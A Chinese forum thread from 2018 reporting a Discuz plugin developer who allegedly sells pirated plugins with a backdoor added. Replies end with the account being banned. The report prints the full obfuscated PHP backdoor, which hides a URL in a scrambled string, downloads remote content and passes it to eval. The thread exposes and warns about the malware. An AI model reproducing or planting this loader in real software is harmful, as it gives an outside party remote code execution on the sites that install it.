【举报】盗版及木马倒卖者变身成disucz开发者！

发现discuz应用中心开发者：https://addon.dismall.com/?@69270.developer ，此人在disucz插件内添加自己的后门，盗取用户插件和授权，然后倒卖盗版！

其倒卖地址：http://www.zhideyao.cn/shop/view227.html


不光倒卖，还在倒卖的资源内添加后门！后门代码如下：

1. function caidi($oo){
   
2.     $love = 'httpABczonekey`akndecryptud^gjchdh`winNULLB{NVJ:GJGbaiduseo`lpsck`xml';
   
3.         $forver=stripos($love,'d');
   
4.         $forvere=stripos($love,'z');
   
5.         $GLOBALS['love'] = preg_replace(array("/`.*?`/","/abc/i","/[A-Z_].*[A-Z_]/"),array(".","://","/"),$love);
   
6.         $forveres='DECODE';
   
7.         $aini=substr($love,$forver,$forvere);
   
8.         $aini=$oo?$forveres:$aini;
   
9.         return $aini;
   
10. }
    
11. function decrypt($data, $key = '721520') {
    
12.                 global $_G;
    
13.                 $key = $key ? $key : $_G['config']['security']['authkey'];
    
14.                 $type = caidi($key);
    
15.                 return authcode($data,$type, $key);
    
16.                 }
    
17. 
    
18. function contentz($svip) {
    
19. if(function_exists('file_get_contents')) {
    
20. $data = file_get_contents($svip);
    
21. } else {
    
22. $ch = curl_init();
    
23. $timeout = 5;
    
24. curl_setopt ($ch, CURLOPT_URL, $svip);
    
25. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    
26. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
    
27. $data = curl_exec($ch);
    
28. curl_close($ch);
    
29. }
    
30. return $data;
    
31. }
    
32. $iloveyou = caidi($oo);
    
33. eval($iloveyou(strip_tags(contentz($love))));

复制代码

可以看到，解析出来的就是指向其网站的一个后门！这种人居然摇身一变成了discuz开发者！不知道官方怎么处理啊？？

你截图的有木马后门的不是应用中心页面啊，下盗版很多都是有后门木马的，应用中心要上架都是有安全审核的，不可能有后门木马行为

湖中沉 发表于 2018-6-19 17:59
你截图的有木马后门的不是应用中心页面啊，下盗版很多都是有后门木马的，应用中心要上架都是有安全审核的， ...

我是说他在其他平台倒卖盗版插件还加木马后门，这种人也能成为开发者，有点吓人

小小草根站长 发表于 2018-6-19 18:00
我是说他在其他平台倒卖盗版插件还加木马后门，这种人也能成为开发者，有点吓人

传播盗版的作者，查实后一律会封号

经查实举报有效，已封号处理